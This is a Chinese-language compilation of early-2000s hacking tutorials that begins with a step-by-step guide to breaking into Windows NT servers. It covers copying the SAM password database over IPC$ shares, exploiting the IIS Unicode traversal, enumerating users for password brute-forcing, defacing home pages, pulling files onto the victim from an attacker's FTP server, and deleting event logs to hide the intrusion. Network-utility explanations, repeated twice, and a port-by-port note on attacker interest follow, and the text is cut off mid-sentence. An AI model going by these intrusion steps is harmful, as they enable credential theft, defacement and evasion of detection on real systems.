下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。
这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下
copy index.htm //127.0.0.1/c$/index.htm
----------------------
如果你要复制到D盘下把C改为D,就行了!
copy index.htm //127.0.0.1/d$/index.htm
----------------------
如果你要把他复制到WINNT目录里
就要把输入
copy index.htm //127.0.0.1/admin$/index.htm
admin$是winnt
----------------------
要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:/winnt/repair/sam._ sam._是数据库的文件名
下面就把127.0.0.1的数据库复制到本地C盘下
copy //127.0.0.1/admin$/repair/sam._ c:/
----------------------
6:set
如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!
下面是我得到的结果!我来分析它,只是找主页在那而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:/WINNT/system32/cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:/WINNT/system32/os2/dll;
OS=Windows_NT
Path=D:/WINNT/system32;D:/WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:/vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:/vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:/WINNT
TZ=GMT-9
USERPROFILE=D:/WINNT/Profiles/Default User
windir=D:/WINNT
粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。
7:nbtstat
如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!
现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。
命令是
nbtstat -A XX.XX.XX.XX
-A一定要大写哦。
下面是得到的结果。
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用户。
这里的用户是PENTIUMII。
8:Shutdown
关了对方的NT服务器的命令
Shutdown //IP地址 t:20
20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。
9:DIR
这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。
你可以本地试下。
10:echo
著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。
我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm
echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm
第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。
第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。
“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。
大家可以本地试下。
可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。
1、首先,我们需要申请一个免费的主页空间。
2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.htm c:/inetpub/wwwroot/index.htm(这里是把你空间上的index.htm下载到对方的c:/inetpub/wwwroot/index.htm)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)
具体的做法:
输入 echo open upload.chinaren.com> c:/cnhack.txt
输入 echo cnhack >> c:/cnhack.txt
输入 echo 39abs >> c:/cnhack.txt
输入 echo get index.htm c:/inetpub/wwwroot/index.htm+>>+c:/cnhack.txt
最后输入 ftp -s:c:/cnhack.txt (利用ftp的-s参数,执行文件里的内容。)
等命令完成时,文件已经下载到你指定的文件里了。
注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)
记得要 del c:/cnhack.txt
11:attrib
这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。
attrib -r index.htm
这个命令是把index.htm的只读属性去掉。
如果把“-”改为“+”则是把这个文件的属性设置为只读
----------------------
attrib +r index.htm
这个命令是把index.htm的属性设置为只读。
12:del
当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。
NT的日志有这些
del C:/winnt/system32/logfiles/*.*
del C:/winnt/ssytem32/config/*.evt
del C:/winnt/system32/dtclog/*.*
del C:/winnt/system32/*.log
del C:/winnt/system32/*.txt
del C:/winnt/*.txt
del C:/winnt/*.log
只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改成其他盘。
详解测试IP地址的几个命令
如果你是一位网络管理员或者是一位普通的拨号用户,可能经常会遇到这样一种情形,那就是访问某一个网站时可能会花费好长时间,或者根本就无法访问需要的网站,这样我们许多宝贵的时间就消耗在等待上了。那我们有没有办法节省花在等待上的时间,最大限度地来提高上网的效率呢?答案当然是肯定的。我们知道之所以访问一个网站需要等待好长时间,那是因为用户的计算机与要访问的网站之间的线路可能出现了交通堵塞的不稳定情况甚至出现了故障,如果我们能事先知道线路的质量不太好的话,就可以做到有的放矢,回避这一不稳定的情况,等到线路状态完好后再去访问需要的网站。看到这儿,有些性急的用户马上就发问了:那你快说说如何才能知道线路质量的好坏呢?要看详情,请看下面的几个网络测试命令,了解和掌握它们将会有助于你更好地使用和维护网络:
一、Ping
适用环境:WIN95/98/2000/NT
使用格式:ping [-t] [-a] [-n count] [-l size]
参数介绍:
-t 让用户所在的主机不断向目标主机发送数据
-a 以IP地址格式来显示目标主机的网络地址
-n count 指定要ping多少次,具体次数由后面的count来指定
-l size 指定发送到目标主机的数据包的大小
主要功能:用来测试一帧数据从一台主机传输到另一台主机所需的时间,从而判断主响应时间。
详细介绍:
该命令主要是用来检查路由是否能够到达,由于该命令的包长非常小,所以在网上传递的速度非常快,可以快速地检测你要去的站点是否可达,一般你在去某一站点时可以先运行一下该命令看看该站点是否可达。如果执行Ping不成功,则可以预测故障出现在以下几个方面:网线是否连通,网络适配器配置是否正确,IP地址是否可用等;如果执行Ping成功而网络仍无法使用,那么问题很可能出在网络系统的软件配置方面,Ping成功只能保证当前主机与目的主机间存在一条连通的物理路径。它的使用格式是在命令提示符下键入:Ping IP地址或主机名,执行结果显示响应时间,重复执行这个命令,你可以发现Ping报告的响应时间是不同的。具体的ping命令后还可跟好多参数,你可以键入ping后回车其中会有很详细的说明。
举例说明:
当我们要访问一个站点例如www.chinayancheng. net时,就可以利用Ping程序来测试目前连接该网站的速度如何。执行时首先在Windows 9x系统上,单击“开始”键并选择运行命令,接着在运行对话框中输入Ping和用户要测试的网址,例如ping www.chinayan- cheng.net,接着该程序就会向指定的Web网址的主服务器发送一个32字节的消息,然后,它将服务器的响应时间记录下来。Ping程序将会向用户显示4次测试的结果。响应时间低于300毫秒都可以认为是正常的,时间超过400毫秒则较慢。出现“请求暂停(Request time out)”信息意味着网址没有在1秒内响应,这表明服务器没有对Ping做出响应的配置或者网址反应极慢。如果你看到4个“请求暂停”信息,说明网址拒绝Ping请求。因为过多的Ping测试本身会产生瓶颈,因此,许多Web管理员不让服务器接受此测试。如果网址很忙或者出于其他原因运行速度很慢,如硬件动力不足,数据信道比较狭窄,过一段时间可以再试一次以确定网址是不是真的有故障。如果多次测试都存在问题,则可以认为是用户的主机和该网址站点没有联接上,用户应该及时与因特网服务商或网络管理员联系。
2.winipcfg
适用环境:WIN95/98/2000
使用格式:winipcfg [/?] [/all]
参数介绍:
/? 显示winipcfg的格式和参数的英文说明
/all 显示所有的有关IP地址的配置信息
主要功能:显示用户所在主机内部的IP协议的配置信息
详细介绍:
winipcfg程序采用windows窗口的形式来显示IP协议的具体配置信息,如果winipcfg命令后面不跟任何参数直接运行,程序将会在窗口中显示网络适配器的物理地址、主机的IP地址、子网掩码以及默认网关等,还可以查看主机的相关信息如:主机名、DNS服务器、节点类型等。其中网络适配器的物理地址在检测网络错误时非常有用。在命令提示符下键入winipcfg/?可获得winipcfg的使用帮助,键入winipcfg/all可获得IP配置的所有属性。
举例说明:
如果我们想很快地了解某一台主机的IP协议的具体配置情况,可以使用winipcfg命令来检测。其具体操作步骤如下:在“运行”对话框中,直接输入winipcfg命令,接着按一下回车键,我们就会看到一个界面。在该界面中,我们了解到目前笔者所在的计算机是用的3COM类型的网卡,网卡的物理地址是00-60-08-07-95-14,主机的IP地址是210.73.140.13,子网掩码是255.255.255.192,路由器的地址是210.73.140.1,如果用户想更加详细地了解该主机的其他IP协议配置信息,例如DNS服务器、DHCP服务器等方面的信息,可以直接单击该界面中的“详细信息”按钮。
详解测试IP地址的几个命令
3.tracert
适用环境:WIN95/98/2000/NT
使用格式:tracert [-d] [-h maximum_hops] [-j host_list] [-w timeout]
参数介绍:
-d 不解析目标主机的名字
-h maximum_hops 指定搜索到目标地址的最大跳跃数
-j host_list 按照主机列表中的地址释放源路由
-w timeout 指定超时时间间隔,程序默认的时间单位是毫秒
主要功能:判定数据包到达目的主机所经过的路径、显示数据包经过的中继节点清单和到达时间。
详细介绍:
这个应用程序主要用来显示数据包到达目的主机所经过的路径。该命令的使用格式是在DOS命令提示符下或者直接在运行对话框中键入如下命令:tracert 主机IP地址或主机名。执行结果返回数据包到达目的主机前所经历的中继站清单,并显示到达每个中继站的时间。该功能同ping命令类似,但它所看到的信息要比ping命令详细得多,它把你送出的到某一站点的请求包,所走的全部路由都告诉你,并且通过该路由的ip是多少,通过该ip的时延是多少。具体的tracert命令后还可跟好多参数,大家可以键入tracert后回车,其中会有很详细的说明。
举例说明:
要是大家想要了解自己的计算机与目标主机之间详细的传输路径信息,可以使用tracert命令来检测一下。其具体操作步骤如下:在“运行”对话框中,直接输入tracert www.chinayancheng.net命令,接着单击一下回车键,我们就会看到一个界面;当然大家也可以在MS-DOS方式下,输入tracert www.chinayancheng.net命令,同样也能看到结果画面。在该画面中,我们可以很详细地跟踪连接到目标网站www.chinayancheng.net的路径信息,例如中途经过多少次信息中转,每次经过一个中转站时花费了多长时间,通过这些时间,我们可以很方便地查出用户主机与目标网站之间的线路到底是在什么地方出了故障等情况。如果我们在tracert命令后面加上一些参数,还可以检测到其他更详细的信息,例如使用参数-d,可以指定程序在跟踪主机的路径信息时,同时也解析目标主机的域名。
4.netstat
适用环境:WIN95/98/2000/NT
使用格式:netstat [-r] [-s] [-n] [-a]
参数介绍:
-r 显示本机路由标的内容
-s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议)
-n 以数字表格形式显示地址和端口
-a 显示所有主机的端口号
主要功能:该命令可以使用户了解到自己的主机是怎样与因特网相连接的。
详细介绍:
netstat程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接的详细信息,例如显示网络连接、路由表和网络接口信息,可以让用户得知目前总共有哪些网络连接正在运行。我们可以使用netstat/?命令来查看一下该命令的使用格式以及详细的参数说明,该命令的使用格式是在DOS命令提示符下或者直接在运行对话框中键入如下命令:netstat[参数],利用该程序提供的参数功能,我们可以了解该命令的其他功能信息,例如显示以太网的统计信息,显示所有协议的使用状态,这些协议包括TCP协议、UDP协议以及IP协议等,另外还可以选择特定的协议并查看其具体使用信息,还能显示所有主机的端口号以及当前主机的详细路由信息。
举例说明:
如果我们想要了解盐城市信息网络中心节点的出口地址、网关地址及主机地址等信息的话,可以使用netstat命令来查询。具体操作方法如下:在“运行”对话框中,直接输入netstat命令,接着单击一下回车键,我们就会看到一个界面;当然大家也可以在MS-DOS方式下,输入netstat命令。在界面中,我们可以了解到用户所在的主机采用的协议类型、当前主机与远端相连主机的IP地址以及它们之间的连接状态等信息。
详解测试IP地址的几个命令
如果你是一位网络管理员或者是一位普通的拨号用户,可能经常会遇到这样一种情形,那就是访问某一个网站时可能会花费好长时间,或者根本就无法访问需要的网站,这样我们许多宝贵的时间就消耗在等待上了。那我们有没有办法节省花在等待上的时间,最大限度地来提高上网的效率呢?答案当然是肯定的。我们知道之所以访问一个网站需要等待好长时间,那是因为用户的计算机与要访问的网站之间的线路可能出现了交通堵塞的不稳定情况甚至出现了故障,如果我们能事先知道线路的质量不太好的话,就可以做到有的放矢,回避这一不稳定的情况,等到线路状态完好后再去访问需要的网站。看到这儿,有些性急的用户马上就发问了:那你快说说如何才能知道线路质量的好坏呢?要看详情,请看下面的几个网络测试命令,了解和掌握它们将会有助于你更好地使用和维护网络:
一、Ping
适用环境:WIN95/98/2000/NT
使用格式:ping [-t] [-a] [-n count] [-l size]
参数介绍:
-t 让用户所在的主机不断向目标主机发送数据
-a 以IP地址格式来显示目标主机的网络地址
-n count 指定要ping多少次,具体次数由后面的count来指定
-l size 指定发送到目标主机的数据包的大小
主要功能:用来测试一帧数据从一台主机传输到另一台主机所需的时间,从而判断主响应时间。
详细介绍:
该命令主要是用来检查路由是否能够到达,由于该命令的包长非常小,所以在网上传递的速度非常快,可以快速地检测你要去的站点是否可达,一般你在去某一站点时可以先运行一下该命令看看该站点是否可达。如果执行Ping不成功,则可以预测故障出现在以下几个方面:网线是否连通,网络适配器配置是否正确,IP地址是否可用等;如果执行Ping成功而网络仍无法使用,那么问题很可能出在网络系统的软件配置方面,Ping成功只能保证当前主机与目的主机间存在一条连通的物理路径。它的使用格式是在命令提示符下键入:Ping IP地址或主机名,执行结果显示响应时间,重复执行这个命令,你可以发现Ping报告的响应时间是不同的。具体的ping命令后还可跟好多参数,你可以键入ping后回车其中会有很详细的说明。
举例说明:
当我们要访问一个站点例如www.chinayancheng. net时,就可以利用Ping程序来测试目前连接该网站的速度如何。执行时首先在Windows 9x系统上,单击“开始”键并选择运行命令,接着在运行对话框中输入Ping和用户要测试的网址,例如ping www.chinayan- cheng.net,接着该程序就会向指定的Web网址的主服务器发送一个32字节的消息,然后,它将服务器的响应时间记录下来。Ping程序将会向用户显示4次测试的结果。响应时间低于300毫秒都可以认为是正常的,时间超过400毫秒则较慢。出现“请求暂停(Request time out)”信息意味着网址没有在1秒内响应,这表明服务器没有对Ping做出响应的配置或者网址反应极慢。如果你看到4个“请求暂停”信息,说明网址拒绝Ping请求。因为过多的Ping测试本身会产生瓶颈,因此,许多Web管理员不让服务器接受此测试。如果网址很忙或者出于其他原因运行速度很慢,如硬件动力不足,数据信道比较狭窄,过一段时间可以再试一次以确定网址是不是真的有故障。如果多次测试都存在问题,则可以认为是用户的主机和该网址站点没有联接上,用户应该及时与因特网服务商或网络管理员联系。
2.winipcfg
适用环境:WIN95/98/2000
使用格式:winipcfg [/?] [/all]
参数介绍:
/? 显示winipcfg的格式和参数的英文说明
/all 显示所有的有关IP地址的配置信息
主要功能:显示用户所在主机内部的IP协议的配置信息
详细介绍:
winipcfg程序采用windows窗口的形式来显示IP协议的具体配置信息,如果winipcfg命令后面不跟任何参数直接运行,程序将会在窗口中显示网络适配器的物理地址、主机的IP地址、子网掩码以及默认网关等,还可以查看主机的相关信息如:主机名、DNS服务器、节点类型等。其中网络适配器的物理地址在检测网络错误时非常有用。在命令提示符下键入winipcfg/?可获得winipcfg的使用帮助,键入winipcfg/all可获得IP配置的所有属性。
举例说明:
如果我们想很快地了解某一台主机的IP协议的具体配置情况,可以使用winipcfg命令来检测。其具体操作步骤如下:在“运行”对话框中,直接输入winipcfg命令,接着按一下回车键,我们就会看到一个界面。在该界面中,我们了解到目前笔者所在的计算机是用的3COM类型的网卡,网卡的物理地址是00-60-08-07-95-14,主机的IP地址是210.73.140.13,子网掩码是255.255.255.192,路由器的地址是210.73.140.1,如果用户想更加详细地了解该主机的其他IP协议配置信息,例如DNS服务器、DHCP服务器等方面的信息,可以直接单击该界面中的“详细信息”按钮。
详解测试IP地址的几个命令
3.tracert
适用环境:WIN95/98/2000/NT
使用格式:tracert [-d] [-h maximum_hops] [-j host_list] [-w timeout]
参数介绍:
-d 不解析目标主机的名字
-h maximum_hops 指定搜索到目标地址的最大跳跃数
-j host_list 按照主机列表中的地址释放源路由
-w timeout 指定超时时间间隔,程序默认的时间单位是毫秒
主要功能:判定数据包到达目的主机所经过的路径、显示数据包经过的中继节点清单和到达时间。
详细介绍:
这个应用程序主要用来显示数据包到达目的主机所经过的路径。该命令的使用格式是在DOS命令提示符下或者直接在运行对话框中键入如下命令:tracert 主机IP地址或主机名。执行结果返回数据包到达目的主机前所经历的中继站清单,并显示到达每个中继站的时间。该功能同ping命令类似,但它所看到的信息要比ping命令详细得多,它把你送出的到某一站点的请求包,所走的全部路由都告诉你,并且通过该路由的ip是多少,通过该ip的时延是多少。具体的tracert命令后还可跟好多参数,大家可以键入tracert后回车,其中会有很详细的说明。
举例说明:
要是大家想要了解自己的计算机与目标主机之间详细的传输路径信息,可以使用tracert命令来检测一下。其具体操作步骤如下:在“运行”对话框中,直接输入tracert www.chinayancheng.net命令,接着单击一下回车键,我们就会看到一个界面;当然大家也可以在MS-DOS方式下,输入tracert www.chinayancheng.net命令,同样也能看到结果画面。在该画面中,我们可以很详细地跟踪连接到目标网站www.chinayancheng.net的路径信息,例如中途经过多少次信息中转,每次经过一个中转站时花费了多长时间,通过这些时间,我们可以很方便地查出用户主机与目标网站之间的线路到底是在什么地方出了故障等情况。如果我们在tracert命令后面加上一些参数,还可以检测到其他更详细的信息,例如使用参数-d,可以指定程序在跟踪主机的路径信息时,同时也解析目标主机的域名。
4.netstat
适用环境:WIN95/98/2000/NT
使用格式:netstat [-r] [-s] [-n] [-a]
参数介绍:
-r 显示本机路由标的内容
-s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议)
-n 以数字表格形式显示地址和端口
-a 显示所有主机的端口号
主要功能:该命令可以使用户了解到自己的主机是怎样与因特网相连接的。
详细介绍:
netstat程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接的详细信息,例如显示网络连接、路由表和网络接口信息,可以让用户得知目前总共有哪些网络连接正在运行。我们可以使用netstat/?命令来查看一下该命令的使用格式以及详细的参数说明,该命令的使用格式是在DOS命令提示符下或者直接在运行对话框中键入如下命令:netstat[参数],利用该程序提供的参数功能,我们可以了解该命令的其他功能信息,例如显示以太网的统计信息,显示所有协议的使用状态,这些协议包括TCP协议、UDP协议以及IP协议等,另外还可以选择特定的协议并查看其具体使用信息,还能显示所有主机的端口号以及当前主机的详细路由信息。
举例说明:
如果我们想要了解盐城市信息网络中心节点的出口地址、网关地址及主机地址等信息的话,可以使用netstat命令来查询。具体操作方法如下:在“运行”对话框中,直接输入netstat命令,接着单击一下回车键,我们就会看到一个界面;当然大家也可以在MS-DOS方式下,输入netstat命令。在界面中,我们可以了解到用户所在的主机采用的协议类型、当前主机与远端相连主机的IP地址以及它们之间的连接状态等信息。
一些常见端口的中文介绍
0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用一种通常的闭合端口
连接它时将产生不同的结果。一种典型的扫描:使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。
1 tcpmux 这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,缺省情况下tcpmux在这种系统中被打开。
Iris机器在发布时含有几个缺省的无密码的帐户,如lp, guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox,
和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux并利用这些帐户。
7 Echo 你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255的信息。
常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到另一个机器的UDP数据包,而两个机器分别以 它们最快的方式回应这些数据包。(参见Chargen)
另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做“Resonate Global Dispatch”,它与DNS的这一端 口连接以确定最近的路由。
Harvest/squid cache将从3130端口发送UDP echo:“如果将cache的source_ping on选项打开,它将对原始主机的UDP echo
端口回应一个HIT reply。”这将会产生许多这类数据包。
11 sysstat 这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信 息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似
再说一遍:ICMP没有端口,ICMP port 11通常是ICMP type=11
19 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时,会发送含有垃 圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。由于服务器企
图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这 个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。
21 ftp 最常见的攻击者用于寻找打开“anonymous”的ftp服务器的方法。这些服务器带有可读写的目录。Hackers或Crackers 利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。
22 ssh PcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式,许多使用 RSAREF库的版本有不少漏洞。(建议在其它端口运行ssh)
还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程 序的人无意中扫描到。
UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632(十六进制的0x1600)位交换后是0x0016
(使进制的22)。
23 Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使 用其它技术,入侵者会找到密码。
25 smtp 攻击者(spammer)寻找SMTP服务器是为了传递他们的spam。入侵者的帐户总被关闭,他们需要拨号连接到高带宽 的e-mail服务器上,将简单的信息传递到不同的地址。SMTP服务器(尤其是sendmail)是进入系统的最常用方法之一,因为 它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。
53 DNS Hacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其它通讯。因此防火墙常常过滤或记录
53端口。
需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常 使用这种方法穿透防火墙。
67和68 Bootp和DHCP UDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的
数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的 “中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置,服务器向67端口(bootpc)广播回应请求。 这种回应使用广播是因为客户端还不知道可以发送的IP地址。
69 TFTP(UDP) 许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常错误配置而从系统
提供任何文件,如密码文件。它们也可用于向系统写入文件。
79 finger Hacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其它机器finger扫描。
98 linuxconf 这个程序提供linux boxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有 许多安全问题。一些版本setuid root,信任局域网,在/tmp下建立Internet可访问的文件,LANG环境变量有缓冲区溢出。此 外因为它包含整合的服务器,许多典型的HTTP漏洞可能存在(缓冲区溢出,历遍目录等)
109 POP2 并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)。在同一个服务器上POP3的漏洞在POP2中同样 存在。
110 POP3 用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少 有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它缓冲区溢出错误。
111 sunrpc portmap rpcbind Sun RPC PortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。 常见RPC服务有:rpc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供服务 的特定端口测试漏洞。
记住一定要记录线路中的daemon, IDS, 或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。
113 Ident auth 这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息 (会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP, POP, IMAP, SMTP和IRC等服务。通常如果有许多客户通
过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你阻断这个端口客户端会感觉到在防火墙另一边与 e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回RST,着将回停止这一缓慢的连接。
119 NNTP news 新闻组传输协议,承载USENET通讯。当你链接到诸如:news://comp.security.firewalls/. 的地址
时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻
组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。
135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111
端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper注册它们的位置。远端客户连接到机器时,它们查
询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如:这个机器上运行Exchange Server吗? 是什么版本?
这个端口除了被用来查询服务(如使用epdump)还可以被用于直接攻击。有一些DoS攻击直接针对这个端口。
137 NetBIOS name service nbtstat (UDP) 这是防火墙管理员最常见的信息,请仔细阅读文章后面的NetBIOS一节
139 NetBIOS
File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。
大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些VBS(IE5 VisualBasic Scripting)开始将它们自己拷贝到 这个端口,试图在这个端口繁殖。
143 IMAP 和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住:一种Linux蠕虫(admw0rm) 会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP 后,这些漏洞变得流行起来。Morris蠕虫以后这还是第一次广泛传播的蠕虫。
这一端口还被用于IMAP2,但并不流行。
已有一些报道发现有些0到143端口的攻击源于脚本。
161 SNMP(UDP) 入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中,通过SNMP客获得 这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他 们可能会试验所有可能的组合。
SNMP包可能会被错误的指向你的网络。Windows机器常会因为错误配置将HP JetDirect remote management软件使用SNMP。
HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名,你会看见这种包在子网内广播(cable modem, DSL)
查询sysName和其它信息。
162 SNMP trap 可能是由于错误配置
177 xdmcp 许多Hacker通过它访问X-Windows控制台, 它同时需要打开6000端口。
513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供了很 有趣的信息。
553 CORBA
IIOP (UDP) 如果你使用cable modem或DSL VLAN,你将会看到这个端口的广播。CORBA是一种面向对象的RPC(remote procedure
call)系统。Hacker会利用这些信息进入系统。
600 Pcserver backdoor 请查看1524端口
一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.
635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的,但基于TCP的 mountd有所增加(mountd同时运行于两个端口)。记住,mountd可运行于任何端口(到底在哪个端口,需要在端口111做 portmap查询),只是Linux默认为635端口,就象NFS通常运行于2049端口。
1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接网络,它们请求操作系统为
